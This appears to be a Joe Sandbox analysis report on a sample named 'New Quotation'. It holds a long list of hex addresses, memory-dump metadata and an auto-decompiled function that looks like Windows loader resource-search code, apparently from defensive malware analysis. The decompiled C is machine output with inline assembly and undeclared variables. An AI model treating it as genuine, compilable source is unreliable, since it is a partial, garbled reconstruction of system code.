                                                                                                                                                                                          0x1d83459e
                                                                                                                                                                                          0x1d8345a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8345a4
                                                                                                                                                                                          0x1d7ded9f
                                                                                                                                                                                          0x1d7dedae
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8345af
                                                                                                                                                                                          0x1d8345af
                                                                                                                                                                                          0x1d8345b4
                                                                                                                                                                                          0x1d8345ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8345ba
                                                                                                                                                                                          0x1d7ded9f
                                                                                                                                                                                          0x1d7ded73
                                                                                                                                                                                          0x1d7dee15
                                                                                                                                                                                          0x1d7dee22
                                                                                                                                                                                          0x1d7dee50
                                                                                                                                                                                          0x1d7dee56
                                                                                                                                                                                          0x1d7dee58
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dee5a
                                                                                                                                                                                          0x1d7dee5d
                                                                                                                                                                                          0x1d83460c
                                                                                                                                                                                          0x1d7def00
                                                                                                                                                                                          0x1d7def00
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def00
                                                                                                                                                                                          0x1d7dee69
                                                                                                                                                                                          0x1d7dee6b
                                                                                                                                                                                          0x1d7dee71
                                                                                                                                                                                          0x1d7dee78
                                                                                                                                                                                          0x1d7dee83
                                                                                                                                                                                          0x1d7dee85
                                                                                                                                                                                          0x1d7dee8b
                                                                                                                                                                                          0x1d8345dc
                                                                                                                                                                                          0x1d8345e3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8345e9
                                                                                                                                                                                          0x1d8345ec
                                                                                                                                                                                          0x1d8345f2
                                                                                                                                                                                          0x1d8345f5
                                                                                                                                                                                          0x1d8345fb
                                                                                                                                                                                          0x1d834601
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834601
                                                                                                                                                                                          0x1d7dee96
                                                                                                                                                                                          0x1d7dee9c
                                                                                                                                                                                          0x1d7deea2
                                                                                                                                                                                          0x1d7ded10
                                                                                                                                                                                          0x1d7ded10
                                                                                                                                                                                          0x1d7ded12
                                                                                                                                                                                          0x1d7ded18
                                                                                                                                                                                          0x1d7ded1a
                                                                                                                                                                                          0x1d7ded23
                                                                                                                                                                                          0x1d7ded26
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ded26
                                                                                                                                                                                          0x1d7dee24
                                                                                                                                                                                          0x1d7dee2a
                                                                                                                                                                                          0x1d7dee2d
                                                                                                                                                                                          0x1d7dee33
                                                                                                                                                                                          0x1d7dee39
                                                                                                                                                                                          0x1d7dee3f
                                                                                                                                                                                          0x1d7dee45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dee45
                                                                                                                                                                                          0x1d7ded2c
                                                                                                                                                                                          0x1d7ded10
                                                                                                                                                                                          0x1d7deead
                                                                                                                                                                                          0x1d7deeaf
                                                                                                                                                                                          0x1d7deeb5
                                                                                                                                                                                          0x1d7deeb7
                                                                                                                                                                                          0x1d7df6c9
                                                                                                                                                                                          0x1d7df6cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7deebd
                                                                                                                                                                                          0x1d7deecd
                                                                                                                                                                                          0x1d7deed2
                                                                                                                                                                                          0x1d7deed4
                                                                                                                                                                                          0x1d8343ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8343ea
                                                                                                                                                                                          0x1d7deeda
                                                                                                                                                                                          0x1d7deee0
                                                                                                                                                                                          0x1d7deee6
                                                                                                                                                                                          0x1d7deeec
                                                                                                                                                                                          0x1d7deeec
                                                                                                                                                                                          0x1d7deef4
                                                                                                                                                                                          0x1d7deefa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7deefa
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7deeb7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ded07
                                                                                                                                                                                          0x1d834355
                                                                                                                                                                                          0x1d834355
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834355
                                                                                                                                                                                          0x1d834353
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7decf3
                                                                                                                                                                                          0x1d7dec5d
                                                                                                                                                                                          0x1d7df2cb
                                                                                                                                                                                          0x1d7df2cd
                                                                                                                                                                                          0x1d7df2f7
                                                                                                                                                                                          0x1d7df2f7
                                                                                                                                                                                          0x1d7df2fa
                                                                                                                                                                                          0x1d7df300
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df300
                                                                                                                                                                                          0x1d7df2d6
                                                                                                                                                                                          0x1d7df2de
                                                                                                                                                                                          0x1d7df2e3
                                                                                                                                                                                          0x1d7df2e5
                                                                                                                                                                                          0x1d8342c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8342c3
                                                                                                                                                                                          0x1d7df2eb
                                                                                                                                                                                          0x1d7df2f1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df2f1
                                                                                                                                                                                          0x1d7dec63
                                                                                                                                                                                          0x1d7dec63
                                                                                                                                                                                          0x1d7dec6b
                                                                                                                                                                                          0x1d8342d2
                                                                                                                                                                                          0x1d7dec71
                                                                                                                                                                                          0x1d7dec71
                                                                                                                                                                                          0x1d7dec71
                                                                                                                                                                                          0x1d7dec75
                                                                                                                                                                                          0x1d7dec7b
                                                                                                                                                                                          0x1d7dec83
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dec85
                                                                                                                                                                                          0x1d7dec85
                                                                                                                                                                                          0x1d7dec8c
                                                                                                                                                                                          0x1d7dec8c
                                                                                                                                                                                          0x1d7dec8e
                                                                                                                                                                                          0x1d7dec94
                                                                                                                                                                                          0x1d7dec9a
                                                                                                                                                                                          0x1d7dec9c
                                                                                                                                                                                          0x1d7decad
                                                                                                                                                                                          0x1d7decb3
                                                                                                                                                                                          0x1d7decb9
                                                                                                                                                                                          0x1d7decbe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7decc4
                                                                                                                                                                                          0x1d7decd7
                                                                                                                                                                                          0x1d8342de
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8342de
                                                                                                                                                                                          0x1d7decdd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8342ed
                                                                                                                                                                                          0x1d8342ed
                                                                                                                                                                                          0x1d8342f7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8342f7
                                                                                                                                                                                          0x1d7dec9c
                                                                                                                                                                                          0x1d7dec83
                                                                                                                                                                                          0x1d7debf4
                                                                                                                                                                                          0x1d7debf6
                                                                                                                                                                                          0x1d7dec1c
                                                                                                                                                                                          0x1d7dec1e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dec24
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dec24
                                                                                                                                                                                          0x1d7debf8
                                                                                                                                                                                          0x1d7debf8
                                                                                                                                                                                          0x1d7debfd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dec03
                                                                                                                                                                                          0x1d7dec16
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7dec16
                                                                                                                                                                                          0x1d7def06
                                                                                                                                                                                          0x1d7def06
                                                                                                                                                                                          0x1d7def09
                                                                                                                                                                                          0x1d7def0b
                                                                                                                                                                                          0x1d7df20c
                                                                                                                                                                                          0x1d7df20c
                                                                                                                                                                                          0x1d7df20e
                                                                                                                                                                                          0x1d7df631
                                                                                                                                                                                          0x1d7df633
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df639
                                                                                                                                                                                          0x1d7df63b
                                                                                                                                                                                          0x1d834708
                                                                                                                                                                                          0x1d83470b
                                                                                                                                                                                          0x1d7df673
                                                                                                                                                                                          0x1d7df673
                                                                                                                                                                                          0x1d7df679
                                                                                                                                                                                          0x1d7df67b
                                                                                                                                                                                          0x1d7df696
                                                                                                                                                                                          0x1d7df696
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df696
                                                                                                                                                                                          0x1d7df67d
                                                                                                                                                                                          0x1d7df67f
                                                                                                                                                                                          0x1d7df694
                                                                                                                                                                                          0x1d7df694
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df694
                                                                                                                                                                                          0x1d7df681
                                                                                                                                                                                          0x1d7df683
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df68c
                                                                                                                                                                                          0x1d7df68e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df68e
                                                                                                                                                                                          0x1d7df648
                                                                                                                                                                                          0x1d7df64f
                                                                                                                                                                                          0x1d7df654
                                                                                                                                                                                          0x1d7df656
                                                                                                                                                                                          0x1d8346f9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8346f9
                                                                                                                                                                                          0x1d7df65c
                                                                                                                                                                                          0x1d7df65f
                                                                                                                                                                                          0x1d7df668
                                                                                                                                                                                          0x1d7df66b
                                                                                                                                                                                          0x1d7df66d
                                                                                                                                                                                          0x1d834264
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834264
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df66d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df20e
                                                                                                                                                                                          0x1d7def11
                                                                                                                                                                                          0x1d7def13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def19
                                                                                                                                                                                          0x1d7def1b
                                                                                                                                                                                          0x1d7def4b
                                                                                                                                                                                          0x1d7def4b
                                                                                                                                                                                          0x1d7def51
                                                                                                                                                                                          0x1d7def53
                                                                                                                                                                                          0x1d7def5b
                                                                                                                                                                                          0x1d7def5b
                                                                                                                                                                                          0x1d7def60
                                                                                                                                                                                          0x1d7def63
                                                                                                                                                                                          0x1d7def66
                                                                                                                                                                                          0x1d7df30b
                                                                                                                                                                                          0x1d7df30b
                                                                                                                                                                                          0x1d7df311
                                                                                                                                                                                          0x1d7df315
                                                                                                                                                                                          0x1d7df31a
                                                                                                                                                                                          0x1d7df31d
                                                                                                                                                                                          0x1d834626
                                                                                                                                                                                          0x1d83462b
                                                                                                                                                                                          0x1d83462e
                                                                                                                                                                                          0x1d8346e0
                                                                                                                                                                                          0x1d8346e0
                                                                                                                                                                                          0x1d8346ea
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8346ea
                                                                                                                                                                                          0x1d834634
                                                                                                                                                                                          0x1d7df329
                                                                                                                                                                                          0x1d7df329
                                                                                                                                                                                          0x1d7df32b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df331
                                                                                                                                                                                          0x1d7df333
                                                                                                                                                                                          0x1d7df373
                                                                                                                                                                                          0x1d7df37b
                                                                                                                                                                                          0x1d7df37d
                                                                                                                                                                                          0x1d7df391
                                                                                                                                                                                          0x1d7df39e
                                                                                                                                                                                          0x1d7df3a0
                                                                                                                                                                                          0x1d7df3a2
                                                                                                                                                                                          0x1d83463f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83463f
                                                                                                                                                                                          0x1d7df3a8
                                                                                                                                                                                          0x1d7df3af
                                                                                                                                                                                          0x1d834657
                                                                                                                                                                                          0x1d834663
                                                                                                                                                                                          0x1d834668
                                                                                                                                                                                          0x1d83466e
                                                                                                                                                                                          0x1d834670
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834676
                                                                                                                                                                                          0x1d83467c
                                                                                                                                                                                          0x1d834682
                                                                                                                                                                                          0x1d7df3bb
                                                                                                                                                                                          0x1d7df3bb
                                                                                                                                                                                          0x1d7df3bd
                                                                                                                                                                                          0x1d7df3c0
                                                                                                                                                                                          0x1d7df420
                                                                                                                                                                                          0x1d7df439
                                                                                                                                                                                          0x1d7df441
                                                                                                                                                                                          0x1d7df446
                                                                                                                                                                                          0x1d7df448
                                                                                                                                                                                          0x1d83468d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83468d
                                                                                                                                                                                          0x1d7df44e
                                                                                                                                                                                          0x1d7df451
                                                                                                                                                                                          0x1d7df472
                                                                                                                                                                                          0x1d7df477
                                                                                                                                                                                          0x1d7df47d
                                                                                                                                                                                          0x1d7df483
                                                                                                                                                                                          0x1d7df485
                                                                                                                                                                                          0x1d83469c
                                                                                                                                                                                          0x1d7df4e7
                                                                                                                                                                                          0x1d7df4e7
                                                                                                                                                                                          0x1d7df4e9
                                                                                                                                                                                          0x1d7df530
                                                                                                                                                                                          0x1d7df541
                                                                                                                                                                                          0x1d7df543
                                                                                                                                                                                          0x1d7df549
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df549
                                                                                                                                                                                          0x1d7df4f2
                                                                                                                                                                                          0x1d7df4fb
                                                                                                                                                                                          0x1d7df500
                                                                                                                                                                                          0x1d7df502
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df511
                                                                                                                                                                                          0x1d7df51d
                                                                                                                                                                                          0x1d7df522
                                                                                                                                                                                          0x1d7df524
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df52a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df52a
                                                                                                                                                                                          0x1d7df48b
                                                                                                                                                                                          0x1d7df48d
                                                                                                                                                                                          0x1d7df4d9
                                                                                                                                                                                          0x1d7df4e5
                                                                                                                                                                                          0x1d7df4e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df4e5
                                                                                                                                                                                          0x1d7df498
                                                                                                                                                                                          0x1d7df49d
                                                                                                                                                                                          0x1d7df4a2
                                                                                                                                                                                          0x1d7df4a4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df4b7
                                                                                                                                                                                          0x1d7df4c0
                                                                                                                                                                                          0x1d7df4c5
                                                                                                                                                                                          0x1d7df4c7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df4cd
                                                                                                                                                                                          0x1d7df4d3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df4d3
                                                                                                                                                                                          0x1d7df3c2
                                                                                                                                                                                          0x1d7df3c2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df3c2
                                                                                                                                                                                          0x1d7df3b5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df3b5
                                                                                                                                                                                          0x1d7df33c
                                                                                                                                                                                          0x1d7df340
                                                                                                                                                                                          0x1d7df345
                                                                                                                                                                                          0x1d7df347
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df354
                                                                                                                                                                                          0x1d7df360
                                                                                                                                                                                          0x1d7df365
                                                                                                                                                                                          0x1d7df367
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df36d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df36d
                                                                                                                                                                                          0x1d7df323
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def6c
                                                                                                                                                                                          0x1d7def6c
                                                                                                                                                                                          0x1d7def73
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def79
                                                                                                                                                                                          0x1d7def79
                                                                                                                                                                                          0x1d7def7b
                                                                                                                                                                                          0x1d7def81
                                                                                                                                                                                          0x1d7def81
                                                                                                                                                                                          0x1d7def84
                                                                                                                                                                                          0x1d7def8a
                                                                                                                                                                                          0x1d7def8c
                                                                                                                                                                                          0x1d7df6da
                                                                                                                                                                                          0x1d7deff1
                                                                                                                                                                                          0x1d7deff1
                                                                                                                                                                                          0x1d7deff8
                                                                                                                                                                                          0x1d7df700
                                                                                                                                                                                          0x1d7df6f5
                                                                                                                                                                                          0x1d7df6f5
                                                                                                                                                                                          0x1d7df046
                                                                                                                                                                                          0x1d7df046
                                                                                                                                                                                          0x1d7df04c
                                                                                                                                                                                          0x1d7df04e
                                                                                                                                                                                          0x1d7df07f
                                                                                                                                                                                          0x1d7df07f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df07f
                                                                                                                                                                                          0x1d7df050
                                                                                                                                                                                          0x1d7df057
                                                                                                                                                                                          0x1d7df07d
                                                                                                                                                                                          0x1d7df07d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df07d
                                                                                                                                                                                          0x1d7df059
                                                                                                                                                                                          0x1d7df05b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df05d
                                                                                                                                                                                          0x1d7df05f
                                                                                                                                                                                          0x1d7df062
                                                                                                                                                                                          0x1d7df064
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df06a
                                                                                                                                                                                          0x1d7df075
                                                                                                                                                                                          0x1d7df077
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df077
                                                                                                                                                                                          0x1d7deffe
                                                                                                                                                                                          0x1d7df000
                                                                                                                                                                                          0x1d7df6eb
                                                                                                                                                                                          0x1d7df6eb
                                                                                                                                                                                          0x1d7df6ed
                                                                                                                                                                                          0x1d7df6f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df6f3
                                                                                                                                                                                          0x1d7df006
                                                                                                                                                                                          0x1d7df009
                                                                                                                                                                                          0x1d7df00b
                                                                                                                                                                                          0x1d8346c9
                                                                                                                                                                                          0x1d8346d3
                                                                                                                                                                                          0x1d8346d8
                                                                                                                                                                                          0x1d7df011
                                                                                                                                                                                          0x1d7df011
                                                                                                                                                                                          0x1d7df017
                                                                                                                                                                                          0x1d7df017
                                                                                                                                                                                          0x1d7df019
                                                                                                                                                                                          0x1d7df019
                                                                                                                                                                                          0x1d7df01b
                                                                                                                                                                                          0x1d7df01d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df023
                                                                                                                                                                                          0x1d7df023
                                                                                                                                                                                          0x1d7df025
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df02e
                                                                                                                                                                                          0x1d7df036
                                                                                                                                                                                          0x1d7df038
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df03e
                                                                                                                                                                                          0x1d7df044
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7df044
                                                                                                                                                                                          0x1d7df01d
                                                                                                                                                                                          0x1d7def92
                                                                                                                                                                                          0x1d7def94
                                                                                                                                                                                          0x1d7def96
                                                                                                                                                                                          0x1d8346a3
                                                                                                                                                                                          0x1d8346ad
                                                                                                                                                                                          0x1d8346b2
                                                                                                                                                                                          0x1d7def9c
                                                                                                                                                                                          0x1d7def9c
                                                                                                                                                                                          0x1d7def9e
                                                                                                                                                                                          0x1d7defa4
                                                                                                                                                                                          0x1d7defa4
                                                                                                                                                                                          0x1d7defa4
                                                                                                                                                                                          0x1d7defa6
                                                                                                                                                                                          0x1d7defa8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7defae
                                                                                                                                                                                          0x1d7defb6
                                                                                                                                                                                          0x1d7defb8
                                                                                                                                                                                          0x1d834617
                                                                                                                                                                                          0x1d834617
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834617
                                                                                                                                                                                          0x1d7defbe
                                                                                                                                                                                          0x1d7defc4
                                                                                                                                                                                          0x1d7defc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7defcc
                                                                                                                                                                                          0x1d7defce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7defd4
                                                                                                                                                                                          0x1d7defd6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7defdf
                                                                                                                                                                                          0x1d7defe5
                                                                                                                                                                                          0x1d8346ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8346ba
                                                                                                                                                                                          0x1d7defeb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7defeb
                                                                                                                                                                                          0x1d7defa8
                                                                                                                                                                                          0x1d7def66
                                                                                                                                                                                          0x1d7def1d
                                                                                                                                                                                          0x1d7def23
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def3d
                                                                                                                                                                                          0x1d7def3f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7def45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7deb22
                                                                                                                                                                                          0x1d7deab7
                                                                                                                                                                                          0x1d7deaa7
                                                                                                                                                                                          0x1d7deaa7
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                          • API String ID: 0-1109411897
                                                                                                                                                                                          • Opcode ID: cdb83ccf546658f486f88e08c5f7212138518fa5ec61d6dfb366c18613dcc0cc
                                                                                                                                                                                          • Instruction ID: 847e9a36cbd03e6c458956c0d606f019e6ba99045e9bc26cd089c3a35a949d0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: cdb83ccf546658f486f88e08c5f7212138518fa5ec61d6dfb366c18613dcc0cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86A28A75A0566A8FDBA5CF18C8887ADB7B5BF44715F1082EAD84DA7250DB309E80CF42
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7DAD00 Relevance: 8.1, Strings: 6, Instructions: 573COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                                          			E1D7DAD00(signed int __ecx, signed int __edx, signed int _a4, signed int* _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, char** _a28) {
				char _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				short _v204;
				short _v720;
				signed short _v724;
				void* _v725;
				signed int _v732;
				char _v733;
				char _v734;
				char _v735;
				char _v736;
				signed int _v740;
				void* _v744;
				signed int _v748;
				signed int _v752;
				signed int _v756;
				signed int _v760;
				void* _v764;
				char* _v768;
				char _v772;
				signed int _v776;
				signed int _v780;
				char** _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				signed int _v804;
				signed int _v808;
				signed int _v812;
				char _v816;
				signed int _v820;
				char* _v832;
				short _v834;
				signed short _v836;
				char* _v840;
				char _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t243;
				signed int _t244;
				signed int* _t251;
				signed char* _t252;
				signed int _t253;
				signed char* _t254;
				signed int* _t259;
				signed char* _t260;
				signed int _t261;
				signed char* _t262;
				signed int _t271;
				signed int _t285;
				intOrPtr _t288;
				signed int _t292;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed short _t299;
				signed int _t303;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr* _t325;
				intOrPtr _t326;
				signed char _t328;
				signed int _t331;
				signed int _t334;
				signed int _t340;
				void* _t341;
				signed int* _t343;
				signed int _t345;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				intOrPtr* _t358;
				char* _t378;
				char* _t379;
				signed int _t380;
				signed int _t382;
				void* _t383;
				signed int _t384;
				signed int _t385;
				signed int _t387;
				void* _t388;
				void* _t389;
				signed int _t390;
				void* _t391;
				intOrPtr _t392;
				signed int _t410;
				void* _t415;

				_push(0xfffffffe);
				_push(0x1d8abf60);
				_push(E1D81AD20);
				_push( *[fs:0x0]);
				_t392 = _t391 - 0x338;
				_t243 =  *0x1d8cb370;
				_v12 = _v12 ^ _t243;
				_t244 = _t243 ^ _t390;
				_v32 = _t244;
				_push(_t244);
				 *[fs:0x0] =  &_v20;
				_v28 = _t392;
				_v760 = __edx;
				_v748 = __ecx;
				_t343 = _a8;
				_v752 = _t343;
				_v776 = _a16;
				_v812 = _a20;
				_v820 = _a24;
				_v784 = _a28;
				_v744 = 0;
				_v800 = 0;
				_v796 = 0;
				_v792 = 0;
				_v788 = 0;
				_v733 = 0;
				_t340 = _a4;
				if((_t340 & 0x00000040) != 0) {
					_v734 = 1;
				} else {
					_v734 = 0;
				}
				_v735 = 0;
				_v736 = 0;
				_v772 = 0x4c004a;
				_v768 = L"LdrpResSearchResourceMappedFile Enter";
				_v844 = 0x4a0048;
				_v840 = L"LdrpResSearchResourceMappedFile Exit";
				_t251 =  *( *[fs:0x30] + 0x50);
				if(_t251 != 0) {
					__eflags =  *_t251;
					if(__eflags == 0) {
						goto L3;
					}
					_t252 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
					goto L4;
				} else {
					L3:
					_t252 = 0x7ffe0385;
					L4:
					if(( *_t252 & 0x00000001) != 0) {
						_t253 = E1D7E3C40();
						__eflags = _t253;
						if(_t253 == 0) {
							_t254 = 0x7ffe0384;
						} else {
							_t254 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
						}
						E1D85FC01( &_v772,  *_t254 & 0x000000ff);
						_t343 = _v752;
					}
					_t387 = 0;
					_v756 = 0;
					_t382 = 0;
					if(_t340 < 0) {
						_t387 = 0x80;
						_v756 = 0x80;
					}
					_t371 = _a12;
					if(_t371 != 3) {
						_t345 = _v733;
						goto L10;
					} else {
						_t382 = _t343[2] & 0x0000ffff;
						_v8 = 0;
						_t333 =  *_t343;
						if(( *_t343 & 0xffff0000) != 0) {
							_t334 = E1D8179A0(_t333, L"MUI");
							_t392 = _t392 + 8;
							__eflags = _t334;
							if(__eflags != 0) {
								goto L8;
							}
							_t345 = 1;
							L9:
							_v733 = _t345;
							_v8 = 0xfffffffe;
							_t371 = _a12;
							L10:
							if((_t340 & 0x00000010) != 0 || _t371 - 1 > 2) {
								L21:
								if((_t387 & 0x00060000) == 0x60000) {
									_v732 = 0xc000008a;
									goto L51;
								}
								_t352 =  !_t387;
								_t271 =  !_t340;
								_t410 = _t271 & 0x00000010;
								asm("bt ecx, 0x13");
								asm("bt ecx, 0x11");
								_t371 = (_t371 & 0xffffff00 | _t410 != 0x00000000) & (_t271 & 0xffffff00 | _t410 > 0x00000000) & ((_t271 & 0xffffff00 | _t410 > 0x00000000) & 0xffffff00 | _t410 > 0x00000000);
								_v725 = _t410 != 0;
								_v724 = 1;
								_v720 = 0;
								if(_t371 != 0 || _a12 == 3) {
									if((_t340 & 0x00000010) != 0) {
										__eflags = _t340 & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										}
										goto L27;
									}
									L25:
									if((_t340 & 0x00000004) != 0) {
										_t387 = _t387 | 0x00000004;
										_v756 = _t387;
									}
									_t371 = _v760;
									_t352 = _v748;
									_t415 = E1D7DA2E0(_t352, _v760, _t382, _t387,  &_v724);
									if(_t415 < 0) {
										__eflags = _t340 & 0x00001000;
										if(__eflags != 0) {
											goto L55;
										}
									}
									goto L27;
								} else {
									L27:
									asm("bt eax, 0x12");
									asm("bt esi, 0x13");
									if(((( !_t387 & 0xffffff00 | _t415 >= 0x00000000) & 0xffffff00 | (_t340 & 0x00000010) == 0x00000000) & (_t352 & 0xffffff00 | _t415 >= 0x00000000) & ( !_t387 & 0xffffff00 | _t415 >= 0x00000000)) == 0) {
										_push( &_v792);
										_push( &_v800);
										_push(_t340);
										_push(_v760);
										_push(_v748);
										_t264 = E1D7DB360(_t340, _t382, _t387, __eflags);
										__eflags = _t264;
										if(_t264 >= 0) {
											goto L28;
										}
										goto L55;
									}
									L28:
									_t355 = _v725;
									L29:
									while(1) {
										if((_t387 & 0x00020000) != 0) {
											_t355 = 0;
											_v725 = 0;
										}
										_t384 = 0;
										_v732 = 0;
										_v740 = 0;
										_v764 = 0;
										_t371 = 0;
										while(1) {
											_v780 = _t371;
